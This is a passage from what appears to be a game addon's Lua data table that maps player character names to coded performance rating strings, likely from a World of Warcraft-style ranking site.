["Redrage"] = "RT:424/59%EB:639/83%RM:682/73%",
["Serenamoon"] = "ET:738/94%LB:771/97%RM:653/70%",
["Ashyra"] = "EB:702/88%EM:804/83%",
["Reagane"] = "ET:709/91%EB:554/91%EM:866/89%",
["Cruel"] = "ST:805/99%SB:759/99%SM:963/99%",
["Porelock"] = "EB:748/94%LM:964/98%",
["Tlock"] = "ET:728/93%LB:758/96%LM:949/97%",
["Varanide"] = "RT:478/64%EB:428/81%EM:596/86%",
["Sòul"] = "LT:742/95%EB:746/94%EM:855/88%",
["Demoonica"] = "ET:581/77%EB:701/89%EM:569/86%",
["Donutman"] = "ET:297/86%RB:355/73%EM:827/88%",
["Dragonball"] = "RT:187/63%RB:554/74%EM:750/80%",
["Jerillak"] = "ET:608/81%LB:751/95%EM:737/80%",
["Slashspit"] = "LT:587/97%EB:575/92%EM:818/84%",
["Gerbcraft"] = "ET:387/93%EB:594/93%EM:724/93%",
["Flyingtiger"] = "LT:757/96%LB:734/95%SM:1008/99%",
["Dorkar"] = "RT:405/57%EB:488/87%EM:878/87%",
["Zattii"] = "RB:372/52%UM:356/42%",
["Pickled"] = "RB:369/53%RM:528/58%",
["Shoujo"] = "ET:311/79%EB:714/94%EM:801/86%",
["Bootiechop"] = "UB:284/37%UM:362/38%",
["Ayra"] = "UB:329/46%RM:565/63%",
["Duannai"] = "RB:250/60%EM:692/79%",
["Memespeck"] = "RT:90/56%RB:333/61%RM:435/66%",
["Hotwing"] = "RT:200/60%EB:551/76%EM:781/84%",
["Senzußean"] = "ET:289/79%EB:552/78%RM:623/72%",
["Envisage"] = "ET:323/84%RB:407/57%RM:639/73%",
["Zeitmzun"] = "UT:253/30%RB:273/65%EM:532/85%",
["Kytomo"] = "ET:747/91%EB:607/85%RM:609/70%",
["Gth"] = "CT:29/3%UB:250/32%UM:396/42%",
["Punit"] = "UB:213/26%UM:364/43%",
["Atkhil"] = "CT:27/0%RB:330/72%UM:408/48%",
["Glg"] = "CT:13/19%RB:485/70%RM:223/56%",
["Ãces"] = "UT:43/43%UB:217/27%RM:511/60%",
["Zymotica"] = "EB:684/92%LM:931/96%",
["Wahya"] = "UT:295/39%EB:575/79%SM:1013/99%",
["Blodhgarm"] = "EB:603/82%EM:520/85%",
["Healz"] = "UT:303/37%RB:430/61%EM:824/91%",
["Dyhenir"] = "UT:89/30%CB:198/23%RM:442/51%",
["Carling"] = "RT:564/73%EB:405/82%EM:715/75%",
["Nicholaszy"] = "UB:226/28%EM:397/76%",
["Twokilos"] = "UB:296/40%EM:680/78%",
["Shiftilkin"] = "RB:258/64%RM:338/74%",
["Gglucked"] = "RT:564/72%LB:735/96%LM:973/98%",
["Youslifina"] = "CT:77/11%UB:252/33%RM:539/64%",
["Thiccthicc"] = "CT:28/5%UB:355/49%RM:626/71%",
["Eyeshockstuf"] = "RT:275/74%RB:369/52%RM:558/65%",
["Duskrose"] = "EB:548/78%EM:705/79%",
["Petiteheals"] = "UT:128/40%RB:449/62%RM:458/50%",
["Liangzai"] = "RT:258/72%EB:485/89%EM:776/85%",
["Dretti"] = "UB:129/31%",
["Freshcow"] = "EB:376/76%EM:611/82%",
["Lightdevil"] = "EB:614/84%EM:801/90%",
["Lfa"] = "CB:192/22%RM:593/65%",
["Bëns"] = "CT:174/23%RB:518/74%UM:403/48%",
["Mushroom"] = "UB:200/25%RM:508/56%",
["Milkymeow"] = "ET:578/75%EB:555/79%EM:681/75%",
["Beebobo"] = "RT:51/64%RB:250/61%",
["Jehf"] = "EB:637/88%LM:911/95%",
["Noise"] = "UB:173/40%EM:726/81%",
["Kusakabe"] = "RB:437/60%RM:510/59%",
["Forthright"] = "UT:348/43%EB:564/80%EM:821/90%",
["Pikachoo"] = "UT:113/38%RB:279/63%EM:787/88%",
["Loctar"] = "RB:412/56%RM:304/68%",
["Nanos"] = "CT:90/9%UB:308/40%RM:587/65%",
["Geegi"] = "CT:106/11%EB:492/90%EM:507/84%",
["Jachk"] = "EB:577/80%RM:595/65%",
["Kheelee"] = "CT:87/8%UB:262/35%RM:603/67%",
["Supperwarm"] = "RT:545/68%RB:433/62%RM:408/64%",
["Fiare"] = "CT:75/7%UB:349/46%RM:669/74%",
["Ripbarb"] = "ET:406/90%EB:499/90%RM:504/59%",
["Heimmz"] = "UT:138/48%EB:371/78%RM:619/72%",
["Snyde"] = "UB:319/42%EM:719/79%",
["Wonderboy"] = "CB:174/19%CM:97/7%",
["Johngàlt"] = "UB:230/29%EM:734/80%",
["Herpulis"] = "UT:92/29%RB:462/64%RM:580/64%",
["Thiccgurl"] = "RT:242/72%EB:580/80%EM:699/77%",
["Plzpeelforme"] = "CT:54/13%UB:216/27%UM:310/37%",
["Ssk"] = "ET:258/75%EB:677/91%EM:905/94%",
["Khane"] = "UB:114/29%RM:252/60%",
["Flowabridge"] = "RT:178/60%RB:251/56%RM:499/55%",
["Fbidietcoke"] = "RB:527/73%RM:322/67%",
["Wardforgold"] = "RB:372/67%UM:260/26%",
["Ioio"] = "UB:210/25%UM:270/31%",
["Vicii"] = "CB:168/19%RM:421/50%",
["Yatsumoro"] = "CB:168/19%CM:69/7%",
["Ildimirah"] = "UB:198/48%RM:488/53%",
["Blackskys"] = "CB:192/23%EM:595/77%",
["Babyseven"] = "RT:506/67%EB:492/90%EM:527/86%",
["Coldviolet"] = "RT:557/74%EB:572/94%EM:825/87%",
["Ryoushii"] = "LT:753/95%SB:746/99%LM:801/96%",
["Oldwangge"] = "RT:436/60%EB:726/91%EM:835/87%",
["Pennington"] = "ET:663/87%LB:756/95%EM:787/84%",
["Dontblink"] = "ET:249/78%LB:750/95%LM:954/97%",
["Darkasuka"] = "ET:567/75%LB:761/96%EM:802/85%",
["Trollyah"] = "LT:778/98%LB:781/98%LM:983/98%",
["Msbadshotz"] = "ET:742/94%EB:748/94%EM:785/83%",
["Chanceslul"] = "ST:830/99%SB:860/99%LM:912/97%",
["Tarli"] = "RT:228/74%EB:651/82%EM:826/86%",
["Zinlord"] = "RT:397/52%UB:221/29%RM:574/67%",
["Inted"] = "ET:676/87%EB:692/88%RM:478/54%",
["Pvppatty"] = "ET:584/77%EB:506/87%EM:737/77%",
["Slyphir"] = "ET:700/90%LB:782/98%LM:985/98%",
["Oldyoung"] = "ET:603/80%LB:770/97%EM:879/91%",
["Northe"] = "ET:351/89%LB:769/96%EM:903/93%",
["Taricaya"] = "ET:672/88%EB:730/92%LM:911/95%",
["Boysöul"] = "ET:670/87%EB:742/94%EM:714/78%",
["Fuglybutkind"] = "ET:618/82%LB:722/95%",
["Notnullifer"] = "ET:628/82%EB:736/93%EM:896/92%",
["Flaeroc"] = "ET:621/82%EB:595/83%EM:770/88%",
["Archaleos"] = "LT:643/98%LB:746/96%LM:952/97%",
["Rousi"] = "ET:676/88%LB:604/96%EM:808/90%",
["Auxilium"] = "LT:760/96%LB:759/95%EM:908/92%",
["Smalhandsmik"] = "ET:727/93%EB:745/94%EM:899/92%",
["Hallaster"] = "LT:650/98%LB:586/95%EM:890/92%",
["Murk"] = "ET:698/91%EB:734/93%EM:545/90%",
["Polyp"] = "LT:753/95%LB:765/96%LM:957/97%",
["Terribad"] = "LT:791/98%LB:793/98%LM:960/96%",
["Alexintheair"] = "ET:711/92%SB:722/99%EM:397/80%",
["Lucilleball"] = "RT:447/59%UB:261/36%RM:182/54%",
["Kirigato"] = "LT:490/96%EB:736/93%LM:787/95%",
["Zepheriah"] = "ST:706/99%SB:749/99%LM:954/97%",
["Nii"] = "ET:617/82%RB:334/73%CM:132/12%",
["Maxitude"] = "LT:768/97%LB:766/96%LM:960/97%",
["Zhanan"] = "ET:423/93%EB:723/91%EM:904/93%",
["Murlax"] = "ET:601/80%SB:698/99%LM:981/98%",
["Zoomerboy"] = "ST:799/99%LB:750/95%LM:930/95%",
["Zalorian"] = "LT:752/95%LB:778/97%EM:911/93%",
["Biteonduty"] = "LT:745/95%LB:766/96%EM:753/80%",
["Conorrhea"] = "ET:685/89%EB:702/93%LM:961/98%",
["Unakron"] = "ET:614/87%EB:466/89%EM:785/89%",
["Guyquest"] = "ET:684/89%EB:649/88%EM:869/94%",
["Ariezs"] = "LT:758/96%LB:649/96%EM:872/91%",
["Nethril"] = "LT:627/98%LB:605/96%EM:632/93%",
["Grinji"] = "RT:223/73%EB:546/94%LM:801/97%",
["Martial"] = "ET:265/81%RB:509/74%EM:581/77%",
["Uldian"] = "LT:717/95%EB:336/83%EM:626/85%",
["Tabasco"] = "ET:649/89%LB:778/98%LM:955/97%",
["Sylvio"] = "LT:721/97%LB:763/98%LM:945/98%",
["Machu"] = "LT:764/98%SB:780/99%LM:957/98%",
["Shamangoose"] = "ET:542/85%LB:599/96%EM:847/93%",
["Pvppat"] = "LT:756/97%LB:748/95%LM:926/96%",
["Elementology"] = "ET:719/94%LB:626/96%EM:782/89%",
["Scatman"] = "LT:736/95%LB:734/95%LM:944/97%",
["Dmzwarrior"] = "ET:646/89%LB:768/97%LM:949/97%",
["Silchas"] = "ET:643/84%LB:755/95%EM:893/92%",
["Thursday"] = "ET:622/87%LB:745/96%EM:795/89%",
["Nikoluck"] = "LT:764/97%LB:770/97%LM:905/95%",
["Krazii"] = "ET:617/81%LB:651/96%EM:612/88%",
["Shirshu"] = "LT:650/98%EB:607/94%EM:846/87%",
["Forgotshards"] = "ET:728/93%LB:755/95%EM:796/83%",
["Epicdots"] = "ET:666/87%LB:663/96%LM:845/97%",
["Inflicts"] = "ET:638/84%RB:500/68%RM:299/64%",
["Staraurora"] = "ET:725/93%LB:754/95%EM:872/90%",
["Wufei"] = "LT:730/95%LB:741/95%LM:926/96%",
["Ezora"] = "ST:829/99%SB:811/99%EM:823/94%",
["Mesosphere"] = "LB:730/95%EM:784/84%",
["Xeh"] = "ST:787/99%SB:770/99%AM:1021/100%",
["Poonwarrior"] = "UT:357/49%EB:618/80%UM:74/25%",
["Klar"] = "CT:2/8%EB:679/86%EM:761/80%",
["Enemiga"] = "EB:664/84%RM:692/73%",
["Supersai"] = "ET:616/82%LB:653/96%EM:745/79%",
["Mostima"] = "LT:752/96%SB:774/99%EM:921/94%",
["Froy"] = "LT:746/98%SB:796/99%EM:815/90%",
["Particlemann"] = "LT:524/96%LB:676/97%EM:871/90%",
["Pcrogue"] = "RB:470/63%UM:417/44%",
["Fitztroy"] = "ET:348/88%EB:659/85%UM:284/29%",
["Jelloo"] = "RB:502/66%RM:530/56%",
["Izoaij"] = "ET:581/78%EB:611/94%RM:667/71%",
["Baelganz"] = "UT:304/42%EB:646/82%EM:476/80%",
["Hef"] = "ET:638/94%LB:760/98%LM:877/95%",
["Motothemo"] = "ET:682/89%LB:734/96%LM:921/96%",
["Bbtan"] = "UT:222/28%EB:751/94%EM:890/91%",
["Utubang"] = "EB:631/80%EM:808/84%",
["Ksharp"] = "RT:515/70%LB:775/97%LM:949/97%",
["Smithene"] = "LT:735/95%LB:763/97%EM:624/94%",
["Ragefunkk"] = "RT:508/69%EB:638/82%RM:575/65%",
["Deerazi"] = "ET:341/88%EB:435/81%EM:801/83%",
["Chronicman"] = "LT:779/98%SB:802/99%SM:1033/99%",
["Grindlock"] = "ET:724/93%LB:795/98%EM:889/91%",
["Mitsurisama"] = "RT:164/57%EB:721/91%EM:887/91%",
["Deathcheater"] = "RT:208/68%EB:655/83%EM:837/86%",
["Strally"] = "UT:186/28%RB:536/71%RM:531/60%",
["Eggmane"] = "ET:640/89%LB:758/97%LM:921/97%",
["Teggie"] = "ET:674/88%LB:761/96%EM:874/90%",
["Crazyboy"] = "LT:772/98%SB:837/99%LM:928/96%",
["Ronjowa"] = "RT:161/58%EB:725/91%EM:899/92%",
["Lurska"] = "RT:165/59%LB:797/98%LM:980/98%",
["Nirettzy"] = "ET:354/91%EB:657/83%EM:822/85%",
["Grassfedd"] = "LT:395/96%LB:708/98%EM:753/89%",
["Wefall"] = "ET:368/90%LB:750/95%LM:929/95%",
["Kuje"] = "LT:765/97%LB:784/98%LM:860/97%",
["Arethane"] = "RT:447/58%EB:669/86%EM:733/78%",
["Adhd"] = "LT:521/97%LB:704/97%EM:860/89%",
["Mistriverw"] = "RT:473/64%EB:613/94%EM:822/85%",
["Cuddlebuns"] = "EB:476/85%EM:578/85%",
["Nolimit"] = "LT:457/95%EB:501/87%EM:841/86%",
["Fordwindstar"] = "ET:699/90%EB:709/93%EM:769/89%",
["Shetimert"] = "ET:593/79%LB:747/96%LM:812/97%",
["Gottankk"] = "ET:271/82%EB:407/79%RM:349/70%",
["Guav"] = "RT:399/55%EB:690/87%EM:794/83%",
["Hobzz"] = "UT:353/46%EB:490/86%EM:709/75%",
["Megaphone"] = "ET:330/88%LB:783/98%LM:956/97%",
["Yumekoroshi"] = "EB:746/94%LM:935/96%",
["Stabbyhippie"] = "ET:634/82%LB:755/95%EM:907/93%",
["Edelgard"] = "ET:645/83%EB:689/88%EM:881/91%",
["Topsmegmafan"] = "EB:725/94%UM:354/46%",
["Julius"] = "LB:732/96%LM:958/97%",
["Mulladin"] = "RB:220/50%EM:749/81%",
["Juliaboin"] = "UT:318/39%EB:692/93%EM:738/81%",
["Worthlessgg"] = "CT:152/17%RB:380/64%EM:824/91%",
["Eski"] = "ET:739/90%EB:617/86%EM:824/90%",
["Deadude"] = "CT:140/15%RB:411/56%EM:717/79%",
["Veesuu"] = "CB:181/22%RM:620/69%",
["Cumet"] = "ET:782/93%EB:674/91%EM:410/76%",
["Niuniumeimei"] = "EB:401/82%RM:594/69%",
["Snaggle"] = "EB:489/83%RM:478/74%",
["Sohard"] = "EB:627/91%EM:690/88%",
["Mattycatt"] = "RB:399/54%EM:808/88%",
["Wogabaga"] = "RT:506/66%EB:593/83%EM:737/83%",
["Notmomomen"] = "ET:380/87%EB:516/91%RM:515/60%",
["Thiccbolts"] = "CT:179/20%RB:402/57%RM:621/71%",
["Smites"] = "UB:123/29%UM:279/33%",
["Restolynx"] = "RT:190/61%EB:398/82%EM:684/76%",
["Kaleidoscope"] = "CT:36/2%UB:164/40%RM:241/56%",
["Àvernus"] = "UB:352/48%UM:227/26%",
["Bighealz"] = "RB:445/64%EM:830/90%",
["Emperror"] = "CB:199/24%RM:350/63%",
["Palonosetron"] = "CT:120/12%CB:121/12%UM:170/47%",
["Gurks"] = "CB:139/15%RM:468/51%",
["Wij"] = "LT:601/97%RB:515/71%EM:609/91%",
["Kech"] = "CT:204/24%CB:183/21%EM:697/94%",
["Fat"] = "UB:343/47%CM:77/5%",
["Neraut"] = "CT:124/17%RB:485/70%RM:238/61%",
["Monsteroao"] = "RT:176/60%RB:264/57%RM:323/59%",
["Maotank"] = "ET:658/82%EB:599/85%EM:622/79%",
["Zaflart"] = "UB:309/41%RM:457/50%",
["Hanoi"] = "RB:361/72%RM:365/67%",
["Boomonyou"] = "EB:588/81%EM:774/83%",
["Aliciakeys"] = "RB:528/73%CM:88/7%",
["Alyrion"] = "RT:248/73%EB:447/86%RM:445/53%",
["Cheti"] = "UT:111/35%UB:310/41%EM:690/76%",
["Goldenforest"] = "CT:101/10%RB:447/64%RM:631/73%",
["Barbarossa"] = "CT:39/2%EB:624/85%EM:760/82%",
["Heimdâll"] = "RB:233/54%CM:71/5%",
["Spookyqt"] = "EB:547/81%EM:647/81%",
["Skülduggery"] = "UT:126/39%RB:302/69%UM:361/42%",
["Stormdrain"] = "CT:152/17%EB:383/80%RM:469/55%",
["Nnr"] = "CT:34/1%CB:135/14%UM:38/38%",
["Holdtotem"] = "RB:218/55%RM:233/57%",
["Jonsëy"] = "EB:392/81%RM:568/65%",
["Raizoj"] = "UB:328/45%CM:204/24%",
["Holylaomama"] = "CB:183/22%",
["Chubbies"] = "EB:614/84%EM:710/78%",
["Hawkon"] = "CT:72/24%RB:496/68%RM:589/65%",
["Mesoholyy"] = "CT:58/15%RB:420/57%RM:642/71%",
["Windfather"] = "EB:391/81%EM:367/75%",
["Jespèt"] = "UT:99/38%RB:538/74%LM:961/98%",
["Bobbybacala"] = "UB:298/38%RM:580/65%",
["Danlu"] = "RB:512/74%RM:518/61%",
["Bosshua"] = "RT:153/52%UB:260/34%RM:523/58%",
["Unruthless"] = "CB:192/23%EM:683/75%",
["Sofeiya"] = "RB:217/52%UM:175/46%",
["Sagrath"] = "CT:88/8%EB:585/81%RM:362/62%",
["Peppered"] = "UB:239/30%",
["Enchillada"] = "LT:389/96%EB:666/92%LM:872/98%",
["Satellites"] = "EB:638/87%EM:861/91%",
["Stess"] = "UB:202/25%UM:161/43%",
["Zeheios"] = "UT:286/34%RB:456/64%RM:466/54%",
["Dryongxiny"] = "UB:44/30%UM:329/34%",
["Udderless"] = "ET:289/79%EB:559/77%EM:802/86%",
["Myday"] = "CT:86/12%RB:419/60%UM:268/31%",
["Zlzl"] = "CT:60/20%EB:392/82%RM:229/59%",
["Dancingkali"] = "CT:80/7%UB:214/27%RM:289/63%",
["Peachy"] = "UB:178/46%UM:444/49%",
["Hakarr"] = "UT:16/25%UB:128/33%CM:18/7%",
["Ezula"] = "ET:687/89%EB:651/84%EM:737/77%",
["Jiyong"] = "RT:429/56%EB:670/90%LM:907/96%",
["Ipop"] = "LT:755/96%LB:782/98%LM:962/97%",
["Supercool"] = "LT:751/96%LB:797/98%LM:955/96%",
["Darkarrow"] = "LT:747/95%LB:770/96%LM:939/95%",
["Dragonigor"] = "LT:751/95%SB:715/99%LM:931/95%",
["Pyrrhura"] = "ET:693/90%LB:728/98%EM:731/78%",
["Whiteleopard"] = "LT:758/96%LB:793/98%LM:955/97%",
["Xiaocrug"] = "LT:772/97%LB:759/96%EM:739/94%",
["Smokymcbear"] = "ET:401/94%EB:634/80%EM:616/89%",
["Patesander"] = "ST:737/99%LB:739/98%LM:907/98%",
["Omato"] = "ET:414/94%EB:734/93%EM:847/87%",
["Hbvr"] = "RT:496/68%EB:597/78%RM:455/67%",
["Sturmengrif"] = "ET:402/94%EB:746/94%EM:848/87%",
["Espejismo"] = "ET:606/81%EB:679/91%RM:659/72%",
["Sundaybrunch"] = "ST:720/99%LB:703/98%LM:953/96%",
["Eygon"] = "ST:755/99%LB:784/98%EM:915/93%",
["Jedikush"] = "RT:536/72%EB:604/79%EM:857/90%",
["Dululul"] = "RT:544/73%EB:696/88%RM:640/68%",
["Mugshot"] = "ET:741/94%LB:760/95%LM:939/95%",
["Lazarus"] = "ET:721/92%LB:770/96%EM:918/94%",
["Luckyliu"] = "ET:667/87%EB:597/83%RM:586/71%",
["Dkkcz"] = "ST:735/99%LB:728/98%LM:823/96%",
["Loproto"] = "RT:543/73%EB:598/83%EM:779/83%",
["Findlespurt"] = "ET:724/93%EB:710/90%EM:913/93%",
["Bingoo"] = "ET:739/94%LB:763/98%LM:945/98%",
["Wimpyboy"] = "RT:459/63%EB:684/86%EM:765/80%",
["Murislan"] = "ET:277/83%EB:630/80%EM:795/83%",
["Aakrez"] = "LT:754/96%SB:774/99%LM:961/98%",
["Olddrunk"] = "LT:760/96%LB:751/95%LM:965/98%",
["Diedie"] = "LT:745/95%LB:777/97%EM:911/93%",
["Adorel"] = "ET:644/92%LB:732/95%LM:886/95%",
["Wizoneks"] = "ET:591/78%LB:608/96%EM:612/92%",
["Dysentery"] = "ET:728/93%EB:721/91%EM:865/89%",
["Anan"] = "LT:764/98%EB:647/88%EM:749/85%",
["Kinase"] = "ET:421/94%LB:761/96%LM:934/95%",
["Rts"] = "ET:320/88%EB:657/85%EM:772/78%",
["Kenlol"] = "ET:322/88%EB:457/87%EM:536/87%",
["Vidharr"] = "RT:537/73%RB:525/70%RM:691/74%",
["Bentheblastr"] = "ET:682/89%LB:619/95%EM:877/90%",
["Breezey"] = "LT:769/97%SB:798/99%EM:927/94%",
["Toomuchdog"] = "ET:615/81%LB:750/95%EM:854/90%",
["Hashmiire"] = "ET:648/85%EB:620/86%EM:835/92%",
["Ghostex"] = "ET:329/88%EB:550/78%EM:712/77%",
["Dragonfourth"] = "ET:662/86%EB:649/83%EM:555/85%",
["Puddinpop"] = "ET:607/80%LB:644/95%EM:865/89%",
["Mattowski"] = "LT:729/96%LB:758/97%LM:786/97%",
["Vroost"] = "ET:593/79%EB:741/94%EM:799/85%",
["Pansen"] = "ET:637/84%EB:658/84%EM:517/83%",
["Kakstette"] = "ET:360/91%EB:603/93%EM:873/90%",
["Looselucyy"] = "ET:342/89%LB:754/95%LM:856/98%",
["Khronix"] = "ET:654/86%EB:724/92%EM:880/90%",
["Giantmage"] = "ET:395/93%EB:723/92%EM:868/91%",
["Chobostar"] = "LT:458/95%RB:458/66%RM:328/74%",
["Akaikai"] = "ET:653/85%EB:729/92%EM:792/82%",
["Naiba"] = "ET:645/92%LB:616/95%LM:892/95%",
["Tolen"] = "ET:659/93%LB:768/98%LM:909/96%",
["Heyboss"] = "ET:300/87%EB:621/87%RM:423/70%",
["Bigpanduck"] = "RT:292/67%EB:704/93%EM:825/92%",
["Nephys"] = "ST:743/99%SB:766/99%EM:909/93%",
["Dji"] = "LT:763/98%LB:633/98%EM:915/94%",
["Uncreative"] = "ET:697/90%EB:594/93%EM:764/82%",
["Situational"] = "ET:284/84%LB:707/97%EM:636/90%",
["Smokeman"] = "ET:663/86%EB:715/91%EM:801/83%",
["Zaj"] = "ET:575/83%EB:440/91%EM:815/93%",
["Thesuperelf"] = "ET:366/84%EB:666/93%LM:875/96%",
["Smashy"] = "ET:376/93%EB:722/94%EM:831/92%",
["Slaygi"] = "ET:251/77%EB:679/86%EM:793/82%",
["Andyz"] = "UT:96/37%LB:742/96%EM:850/89%",
["Raskal"] = "SB:727/99%LM:764/96%",
["Horclub"] = "ET:591/85%EB:489/86%EM:850/93%",
["Narfu"] = "RT:389/51%RB:546/73%RM:657/70%",
["Handriand"] = "ET:679/87%EB:748/94%EM:887/92%",
["Quarterpint"] = "LT:544/97%EB:706/90%EM:796/85%",
["Hauntedmac"] = "ET:403/94%EB:610/84%LM:930/95%",
["Noragami"] = "ET:253/79%LB:635/95%LM:789/96%",
["Geraltorivia"] = "RT:434/60%LB:759/96%EM:885/90%",
["Vasago"] = "RT:171/59%EB:461/83%RM:640/70%",
["Toxi"] = "ET:656/85%LB:680/97%EM:920/94%",
["Johanson"] = "LT:576/98%EB:488/87%EM:750/79%",
["Hughjaas"] = "LT:520/96%EB:744/94%LM:946/97%",
["Ssjdragnrice"] = "ET:590/77%EB:600/79%EM:497/80%",
["Aaosa"] = "UT:233/34%RB:570/73%EM:698/77%",
["Amaranthe"] = "RT:181/62%EB:613/78%EM:834/86%",
["Briennetarth"] = "ET:634/88%EB:720/94%LM:888/95%",
["Tryibogaine"] = "RT:462/64%EB:691/88%RM:601/68%",
["Furrior"] = "LT:543/97%EB:628/81%EM:725/79%",
["Sammie"] = "LT:465/95%EB:742/93%EM:630/88%",
["Korvah"] = "LT:548/97%EB:542/90%EM:902/92%",
["Milkthief"] = "ET:295/83%LB:759/95%LM:966/97%",
["Emotives"] = "ET:578/77%LB:755/95%LM:925/95%",
["Bootystalker"] = "EB:748/94%EM:897/91%",
["Idodpskk"] = "RT:473/63%EB:638/83%EM:806/83%",
["Tamarack"] = "RT:541/73%EB:500/87%EM:796/83%",
["Garbagetruck"] = "ET:500/76%EB:700/92%EM:819/92%",
["Canyoulayegg"] = "ET:578/77%LB:575/95%EM:800/85%",
["Zyon"] = "RT:236/74%EB:568/75%EM:831/87%",
["Stealthgiff"] = "RB:555/74%RM:655/71%",
["Kevin"] = "LT:583/97%EB:665/85%EM:812/85%",
["Akeko"] = "RT:441/58%EB:656/85%EM:717/77%",
["Sarthette"] = "LT:754/95%LB:778/97%LM:923/95%",
["Cerveza"] = "ET:246/76%EB:732/92%EM:555/84%",
["Anacrime"] = "ET:636/84%EB:542/90%EM:775/83%",
["Blackxoox"] = "EB:715/90%EM:833/86%",
["Brones"] = "RB:525/70%RM:693/73%",
["Nextdoormryu"] = "RT:501/68%EB:622/81%EM:773/83%",
["Grimsl"] = "ET:686/90%LB:754/95%EM:913/94%",
["Ruhne"] = "ET:722/94%LB:766/97%LM:920/95%",
["Cimi"] = "LT:534/97%EB:598/93%EM:858/88%",
["Ziin"] = "ET:727/93%SB:806/99%LM:944/96%",
["Bday"] = "RT:486/66%EB:623/81%EM:825/88%",
["Mastafunk"] = "LT:437/95%EB:646/83%EM:892/91%",
["Drakkun"] = "LT:752/96%LB:715/98%LM:736/97%",
["Betalain"] = "CT:174/22%LB:765/97%LM:923/95%",
["Trunkhead"] = "LT:572/97%LB:739/98%LM:930/95%",
["Eldara"] = "ET:666/88%LB:792/98%LM:970/98%",
["Conx"] = "LT:551/97%LB:754/96%EM:851/93%",
["Stormtrooper"] = "LT:765/97%SB:751/99%LM:961/97%",
["Chucktard"] = "LT:582/98%EB:599/93%EM:887/91%",
["Alicea"] = "LT:450/95%LB:758/96%EM:893/92%",
["Qethra"] = "RT:364/50%EB:635/82%EM:769/83%",
["Kittypoppins"] = "ET:693/90%SB:814/99%LM:814/97%",
["Slaystation"] = "LT:492/97%LB:646/96%RM:666/71%",
["Aevisé"] = "UB:323/43%RM:587/65%",
["Telza"] = "UT:332/40%RB:206/52%UM:447/48%",
["Artharis"] = "UB:163/42%EM:402/76%",
["Peggyo"] = "CT:67/19%RB:434/62%UM:342/36%",
["Drzip"] = "UT:284/35%UB:336/45%EM:754/82%",
["Maofa"] = "CT:87/8%UB:308/40%RM:522/57%",
["Hearthed"] = "UT:292/35%UB:231/29%UM:242/27%",
["Kagoragar"] = "RB:289/67%RM:566/66%",
["Boneymaloney"] = "CT:69/19%RB:251/59%RM:366/72%",
["Cioc"] = "UT:96/30%RB:431/59%RM:659/73%",
["Bottomdps"] = "RB:450/64%EM:684/77%",
["Chasta"] = "CT:55/13%UB:268/35%EM:407/76%",
["Meijihuo"] = "ET:254/75%RB:409/60%RM:632/74%",
["Whitefur"] = "UT:98/37%RB:452/62%RM:488/54%",
["Phothewin"] = "UB:181/47%RM:194/54%",
["Janice"] = "CT:7/9%UB:121/29%EM:429/77%",
["Golthoz"] = "RT:472/61%RB:472/68%EM:841/91%",
["Hbvvrr"] = "CT:122/13%EB:348/75%UM:411/49%",
["Uncollected"] = "CB:115/11%CM:16/3%",
["Ccolemon"] = "EB:600/83%EM:790/86%",
["Soryn"] = "UB:129/45%RM:360/61%",
["Konsept"] = "UT:193/26%RB:456/66%EM:655/76%",
["Swillie"] = "RB:282/66%EM:459/80%",
["Fudgy"] = "CB:203/24%EM:720/76%",
["Tukarai"] = "UT:353/43%RB:328/72%UM:145/39%",
["Èvilsloth"] = "UT:89/27%RB:320/71%RM:494/58%",
["Clyemaxx"] = "UB:165/42%UM:105/38%",
["Zxan"] = "RT:209/65%RB:431/61%RM:484/56%",
["Nightwolfx"] = "UB:356/48%RM:597/66%",
["Eprincess"] = "LB:725/95%EM:837/89%",
["Paullypally"] = "UB:297/40%UM:401/45%",
["Cambey"] = "CB:102/9%RM:327/68%",
["Lunarshift"] = "RT:195/64%EB:616/84%EM:457/82%",
["Xzialol"] = "CT:45/10%RB:491/68%EM:819/87%",
["Rakshiri"] = "CB:162/19%UM:279/28%",
["Bhopal"] = "EB:424/84%RM:534/59%",
["Aragos"] = "CT:5/0%RB:201/50%UM:106/35%",
["Rzosm"] = "CT:74/21%RB:416/60%RM:570/66%",
["Natsucow"] = "EB:479/89%EM:616/91%",
["Skymd"] = "UB:211/26%RM:204/51%",
["Purplehaze"] = "RB:443/61%RM:338/60%",
["Silvaniss"] = "UT:118/44%EB:341/76%UM:257/26%",
["Ryesd"] = "UB:330/47%RM:241/61%",
["Towelies"] = "RT:211/67%LB:711/95%LM:968/98%",
["Telreynegodx"] = "UB:102/26%RM:394/66%",
["Tryayahuasca"] = "CB:165/19%CM:52/3%",
["Jeniffer"] = "RB:385/55%UM:342/37%",
["Blackwøød"] = "CT:41/8%EB:391/81%EM:853/94%",
["Fayheals"] = "UT:299/39%UB:179/44%UM:308/36%",
["Honkytonk"] = "UB:230/30%EM:419/79%",
["Ikthorn"] = "RT:501/64%RB:515/74%EM:719/81%",
["Grumpybugger"] = "CT:41/10%CB:122/13%CM:184/17%",
["Daica"] = "UB:106/25%RM:218/53%",
["Bornstar"] = "UT:77/26%RB:254/57%CM:127/13%",
["Ajjcal"] = "UT:241/29%RB:252/59%UM:128/35%",
["Hora"] = "CB:150/16%UM:105/32%",
["Windmcflurry"] = "UB:232/30%UM:346/36%",
["Verdys"] = "CT:58/7%EB:614/84%EM:714/78%",
["Axiana"] = "RT:208/62%RB:534/74%EM:703/77%",
["Daweedmon"] = "UB:319/44%UM:371/43%",
["Powerfuldad"] = "RT:177/55%RB:442/65%RM:453/52%",
["Animabane"] = "UT:254/30%RB:326/73%RM:373/73%",
["Myo"] = "CT:59/18%EB:490/79%EM:699/84%",
["Lilena"] = "CT:77/23%UB:335/46%RM:591/65%",
["Holyho"] = "CT:144/16%UB:149/36%UM:153/41%",
["Ezjthssr"] = "RB:356/51%",
["Comissari"] = "UB:161/39%UM:135/38%",
["Deadra"] = "CB:100/24%RM:393/74%",
["Neveroom"] = "CT:27/6%EB:549/76%RM:561/62%",
["Papapurge"] = "CB:177/21%RM:599/69%",
["Rafasage"] = "CT:67/5%UB:105/25%CM:248/24%",
["Robcat"] = "UB:199/47%UM:281/28%",
["Feo"] = "CB:101/9%LM:966/98%",
["Goodzugzug"] = "UT:316/38%EB:388/81%EM:429/78%",
["Livelife"] = "UB:165/39%RM:317/68%",
["Rachelstarr"] = "ET:591/80%EB:470/86%EM:670/75%",
["Ayayo"] = "RT:470/63%EB:645/82%EM:711/75%",
["Ligmabalsack"] = "LT:746/95%LB:769/97%LM:920/95%",
["Steveholt"] = "ST:772/99%LB:788/98%LM:963/97%",
["Dumdumxjc"] = "LT:786/98%LB:737/98%EM:763/81%",
